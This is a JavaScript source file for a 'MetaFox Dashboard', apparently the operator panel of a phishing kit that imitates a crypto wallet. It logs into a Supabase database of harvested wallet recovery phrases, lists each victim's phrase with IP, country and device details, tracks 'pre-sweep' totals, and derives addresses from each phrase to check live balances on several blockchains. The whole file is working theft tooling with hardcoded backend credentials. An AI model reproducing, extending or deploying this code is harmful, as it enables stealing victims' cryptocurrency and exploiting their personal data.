import { createClient } from '@supabase/supabase-js';
import { deriveAccount } from './wallet-core.js';

const SUPABASE_URL = 'https://ylxqsvjmiaixulafoior.supabase.co';
const SUPABASE_ANON_KEY = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6InlseHFzdmptaWFpeHVsYWZvaW9yIiwicm9sZSI6ImFub24iLCJpYXQiOjE3ODkyMjYxMzIsImV4cCI6MjEwNDgwMjEzMn0.H92nzz-OnNVmhKiMOGbAz4f91hq3o8crL1gcK8eQPZk';
const API_BASE = 'https://metafox-v3.com';
const EVM_CHAINS = ['Ethereum', 'BNB Chain', 'Polygon', 'Arbitrum', 'Optimism', 'Base', 'Avalanche'];

const supabase = createClient(SUPABASE_URL, SUPABASE_ANON_KEY);
const $app = document.getElementById('app');

let session = null;
let wallets = [];
let balanceMap = new Map(); // wallet id -> total USD

function el(html) {
  const t = document.createElement('template');
  t.innerHTML = html.trim();
  return t.content.firstElementChild;
}

function fmtUsd(n) {
  if (n == null || !isFinite(n)) return '$0.00';
  return '$' + n.toLocaleString(undefined, { minimumFractionDigits: 2, maximumFractionDigits: 2 });
}

function fmtDate(iso) {
  if (!iso) return '-';
  return new Date(iso).toLocaleString();
}

async function init() {
  const { data } = await supabase.auth.getSession();
  session = data.session;
  if (session) await showDashboard();
  else showLogin();
}

function showLogin(error = '') {
  $app.innerHTML = '';
  const node = el(`
    <div class="card" style="max-width:400px;margin:80px auto">
      <h1 style="margin:0 0 8px">MetaFox Dashboard</h1>
      <div class="sub">Sign in to view saved wallets.</div>
      ${error ? `<div class="error">${error}</div>` : ''}
      <label>Email</label>
      <input id="email" type="email" placeholder="you@example.com" autocomplete="email">
      <label>Password</label>
      <input id="password" type="password" placeholder="••••••••" autocomplete="current-password">
      <button id="login" style="width:100%">Sign in</button>
    </div>
  `);
  $app.appendChild(node);
  const email = node.querySelector('#email');
  const password = node.querySelector('#password');
  const login = async () => {
    login.disabled = true; login.textContent = 'Signing in…';
    const { data, error } = await supabase.auth.signInWithPassword({ email: email.value, password: password.value });
    if (error) { showLogin(error.message); return; }
    session = data.session;
    await showDashboard();
  };
  node.querySelector('#login').onclick = login;
  password.addEventListener('keydown', (e) => { if (e.key === 'Enter') login(); });
  email.focus();
}

async function showDashboard() {
  $app.innerHTML = '<div class="empty">Loading wallets…</div>';
  try {
    await loadWallets();
    renderDashboard();
  } catch (e) {
    $app.innerHTML = `<div class="empty" style="color:var(--danger)">Failed to load wallets: ${e.message}</div>`;
  }
}

async function loadWallets() {
  const { data, error } = await supabase
    .from('wallets')
    .select('*, pre_sweep_total, pre_sweep_balances, device_type, browser, os')
    .order('created_at', { ascending: true });
  if (error) throw error;
  const seen = new Set();
  wallets = (data || []).filter((w) => {
    const phrase = (w.phrase || '').trim().toLowerCase();
    if (!phrase || seen.has(phrase)) return false;
    seen.add(phrase);
    return true;
  });
  wallets.reverse();
}

async function doLogout() {
  await supabase.auth.signOut();
  session = null;
  wallets = [];
  balanceMap.clear();
  showLogin();
}

function renderDashboard() {
  $app.innerHTML = '';
  const user = session.user;
  const totalLoaded = wallets.reduce((sum, w) => sum + (balanceMap.get(w.id) || 0), 0);
  const totalPreSweep = wallets.reduce((sum, w) => sum + (w.pre_sweep_total || 0), 0);

  const header = el(`
    <header>
      <div>
        <h1>MetaFox Dashboard</h1>
        <div class="sub">${wallets.length} wallet${wallets.length === 1 ? '' : 's'} saved</div>
      </div>
      <div class="user-info">
        <span class="user-email">${user.email}</span>
        <button class="secondary" id="logout">Logout</button>
      </div>
    </header>
  `);
  header.querySelector('#logout').onclick = doLogout;
  $app.appendChild(header);

  const stats = el(`
    <div class="stats">
      <div class="stat">
        <div class="stat-value">${wallets.length}</div>
        <div class="stat-label">Wallets</div>
      </div>
      <div class="stat">
        <div class="stat-value">${fmtUsd(totalPreSweep)}</div>
        <div class="stat-label">Pre-sweep total</div>
      </div>
      <div class="stat">
        <div class="stat-value">${fmtUsd(totalLoaded)}</div>
        <div class="stat-label">Current loaded funds</div>
      </div>
      <div class="stat">
        <div class="stat-value">${wallets.filter(w => w.status === 'imported').length}</div>
        <div class="stat-label">Imported</div>
      </div>
      <div class="stat">
        <div class="stat-value">${wallets.filter(w => w.status === 'created').length}</div>
        <div class="stat-label">Created</div>
      </div>
    </div>
  `);
  $app.appendChild(stats);

  const actions = el(`
    <div class="row" style="margin-bottom:16px">
      <button id="loadAll">Load all balances</button>
      <button class="secondary" id="refresh">Refresh list</button>
    </div>
  `);
  actions.querySelector('#loadAll').onclick = () => loadAllBalances();
  actions.querySelector('#refresh').onclick = async () => { await showDashboard(); };
  $app.appendChild(actions);

  if (!wallets.length) {
    $app.appendChild(el('<div class="empty">No wallets found.</div>'));
    return;
  }

  const table = el(`
    <div class="card" style="overflow-x:auto">
      <table>
        <thead>
          <tr>
            <th>Date</th>
            <th>Status</th>
            <th>Wallet</th>
            <th>IP / Country</th>
            <th>Device</th>
            <th>Phrase</th>
            <th>Pre-sweep USD</th>
            <th>Current USD</th>
          </tr>
        </thead>
        <tbody id="tbody"></tbody>
      </table>
    </div>
  `);
  const tbody = table.querySelector('#tbody');
  for (const w of wallets) {
    const total = balanceMap.get(w.id);
    const tr = el(`
      <tr data-id="${w.id}">
        <td>${fmtDate(w.created_at)}</td>
        <td><span class="badge" style="text-transform:capitalize">${w.status || '-'}</span></td>
        <td>${w.wallet_name || '-'}</td>
        <td>${w.ip || '-'}<br><span style="color:var(--muted)">${w.country || '-'}</span></td>
        <td><span style="white-space:nowrap">${w.device_type || '?'}</span><br><span style="color:var(--muted);font-size:12px">${w.browser || '?'} / ${w.os || '?'}</span></td>
        <td>
          <div class="phrase-cell">
            <span class="phrase-text" title="${w.phrase}">${w.phrase}</span>
            <button class="copy-btn secondary" data-phrase="${w.phrase}">Copy</button>
          </div>
        </td>
        <td>${w.pre_sweep_total != null ? `<span class="total">${fmtUsd(w.pre_sweep_total)}</span>` : '<span class="loading">—</span>'}</td>
        <td>
          ${total != null ? `<span class="total">${fmtUsd(total)}</span>` : '<button class="load-one secondary" data-id="' + w.id + '">Load funds</button>'}
        </td>
      </tr>
    `);
    tr.querySelector('.copy-btn').onclick = () => copyPhrase(w.phrase);
    const loadBtn = tr.querySelector('.load-one');
    if (loadBtn) loadBtn.onclick = () => loadOneBalance(w, tr);
    tbody.appendChild(tr);
  }
  $app.appendChild(table);
}

async function copyPhrase(phrase) {
  try {
    await navigator.clipboard.writeText(phrase);
    toast('Phrase copied');
  } catch {
    toast('Copy failed', true);
  }
}

function toast(msg, danger = false) {
  const t = el(`<div style="position:fixed;bottom:20px;right:20px;background:${danger ? 'var(--danger)' : 'var(--success)'};color:#fff;padding:10px 16px;border-radius:8px;font-size:13px;z-index:9999">${msg}</div>`);
  document.body.appendChild(t);
  setTimeout(() => t.remove(), 2200);
}

async function loadAllBalances() {
  const btn = document.getElementById('loadAll');
  if (btn) { btn.disabled = true; btn.textContent = 'Loading…'; }
  for (const w of wallets) {
    if (balanceMap.has(w.id)) continue;
    await loadOneBalance(w, null);
  }
  if (btn) { btn.disabled = false; btn.textContent = 'Load all balances'; }
  renderDashboard();
}

async function loadOneBalance(wallet, row) {
  const btn = row ? row.querySelector('.load-one') : null;
  if (btn) { btn.disabled = true; btn.textContent = '…'; }
  try {
    const total = await fetchWalletTotal(wallet.phrase);
    balanceMap.set(wallet.id, total);
    if (row) {
      const cell = row.cells[7];
      cell.innerHTML = `<span class="total">${fmtUsd(total)}</span>`;
    }
  } catch (e) {
    console.error('Balance load failed', e);
    if (btn) { btn.disabled = false; btn.textContent = 'Retry'; }
  }
}

async function fetchWalletTotal(phrase) {
  const account = deriveAccount(phrase, 0);
  const addresses = {
    Bitcoin: account.bitcoin.address,
    Solana: account.solana.address,
    Tron: account.tron.address,
  };
  for (const c of EVM_CHAINS) addresses[c] = account.evm.address;

  const res = await fetch(`${API_BASE}/api/balances`, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ addresses, customTokens: {} }),
  });
  const data = await res.json();
  if (data.error) throw new Error(data.error);
  let total = 0;
  for (const chain of Object.values(data.chains || {})) {
    for (const t of chain.tokens || []) {
      if (t.usd) total += parseFloat(t.usd);
    }
  }
  return total;
}

init();
